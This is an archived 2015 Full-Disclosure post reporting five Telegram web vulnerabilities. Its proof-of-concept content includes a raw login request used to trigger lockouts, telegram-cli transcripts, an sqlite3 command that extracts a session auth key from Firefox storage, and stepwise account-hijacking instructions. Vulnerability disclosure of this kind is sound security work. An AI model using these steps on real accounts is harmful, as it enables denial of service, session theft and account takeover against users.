lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 29 Sep 2015 18:53:52 -0300
From: Eduardo Alves <edudx1@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Telegram - Multiple Vulnerabilities

#[+] Title:  Telegram - Multiple Vulnerabilities
#[+] Product: Telegram
#[+] Vendor: http://telegram.org/
#[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org
#
# Author      :   Eduardo Alves
# E-Mail      :   edudx1[ at ]gmail[ dot ]com
# Website     :   tempest.com.br/en/



Info:
As we know, the Telegram access uses by default is possible only with a
token (5 digits).
This token could be obtained by: Eavesdropping/desktop
notifications/SMS/incoming calls...



###################################################################################
#[1] my.telegram.org Denial Of Service

 The my.telegram.org website behaves inadequately, blocking the users
access after 5 consecutive incorrect phone number attempts.


## PoC:
---------------------------------------------------------------------------------
POST /auth/send_password HTTP/1.1
Host: my.telegram.org
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://my.telegram.org/auth


phone=%2B55818888888
---------------------------------------------------------------------------------
###################################################################################

#[2] Bypass 5 minutes limit to input token

After the web.telegram.org asks for a new token, we have 5 minutes to send
it.
So, just use Telegram-CLI and you can bypass this


## PoC:
---------------------------------------------------------------------------------
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type
`show_license'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show_license' for details.
Telegram-cli uses libtgl version 2.0.3
Telegram-cli includes software developed by the OpenSSL Project
for use in the OpenSSL Toolkit. (http://www.openssl.org/)
Telegram-cli uses libpython version 2.7.6
I: config dir=[/home/ubuntu/.telegram-cli]
phone number: +558888888888
code ('call' for phone call):    <-----  ex: You can put after 24 hours
---------------------------------------------------------------------------------
###################################################################################

#[3] Telegram Denial Of Service in token request

By submitting incorret code attempts, a normal user can't ask for a new
code for an indetermined period of time.


## PoC:
---------------------------------------------------------------------------------
Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman
Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type
`show_license'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show_license' for details.
Telegram-cli uses libtgl version 2.0.3
Telegram-cli includes software developed by the OpenSSL Project
for use in the OpenSSL Toolkit. (http://www.openssl.org/)
Telegram-cli uses libpython version 2.7.6
I: config dir=[/home/ubuntu/.telegram-cli]
phone number: +558388888888
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
code ('call' for phone call): 123123
 *** incorrect code
---------------------------------------------------------------------------------
Error: In web.telegram.org
---------------------------------------------------------------------------------
Method: auth.signIn
Result:
{"_":"rpc_error","error_code":420,"error_message":"FLOOD_WAIT_86129"}
Stack: Error
    at h (https://web.telegram.org/js/app.js:16:26020)
    at https://web.telegram.org/js/app.js:16:27238
    at l (https://web.telegram.org/js/app.js:8:6393)
    at https://web.telegram.org/js/app.js:8:6565
    at u.$eval (https://web.telegram.org/js/app.js:8:13762)
    at u.$digest (https://web.telegram.org/js/app.js:8:12258)
    at https://web.telegram.org/js/app.js:8:13847
    at s (https://web.telegram.org/js/app.js:7:744)
    at https://web.telegram.org/js/app.js:7:2742
    at n (https://web.telegram.org/js/app.js:2:16525)
---------------------------------------------------------------------------------
###################################################################################

#[4] User identity validation abscence

In various scenarios web applications require session management and access
control mechanisms in order to enforce certain actions to be carried out,
exclusively, by certified/authorized personnel.
In web.telegram.org, this management control is implemented through Local
Storage. However, there is a possibility of an attacker — who possesses
valid dc1_auth_key from the victim — to access the application alongside
the true user of the given account.

Ex: Firefox
---------------------------------------------------------------------------------
sqlite3 -header -separator " " webappsstore.sqlite "select * from
webappsstore2;" > out.txt; cat out.txt | grep dc1_aut
gro.margelet.bew.:https:443 dc1_auth_key
"ccccccccccccc14c18f5b5eab567b23e30a9ffa803027f8ff7c763bb5bbf9bd9908ac5ff53c718b1c8d7b7f9b040956184ca7748cfdaed5eeec071cdbc18cb06151b83ad8edd8febf2c6832b875627e1467c8dd4c612cda4df63cdf95129c960e6521806e12debc3b96846acf668b74c32f3f1f8ad820a60de836316523549cccccccccccccccccc9ec6ec38fd619752d1ed145427dd7600af2312ab493ebebadf6b1effb6e11764887d5c8a679cc371797f92d284dc54c35fb578c41ca61222d7781485cccccccccccccccccccccccca96a97f8dced0a793c80cbd4ed064bb95ea63e69ed912ccf94c53f7563cb27346ccccccccccccccccccc6fd0492db
---------------------------------------------------------------------------------
###################################################################################

#[5] Hijacking account and importing contacts

If the victim uses only the passcode as two-step verification, we can reset
her account, and as a result, the attacker creates the possibility for
importing contacts and hijacking the account:


- Attacker asks for token using Telegram-Web
- Obtains the code
- Resets account
- Waits for the victim to log-in
- Imports contacts (auto)
- Kills the victim's session
- Enables Two-Step verification (passcode + email)



Thanks to:

Leandro Oliveira
Joaquim Brasil
Marcelo Pessoa
Toronto Garcez
Tiago Barbosa

From Tempest Security Intelligence

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists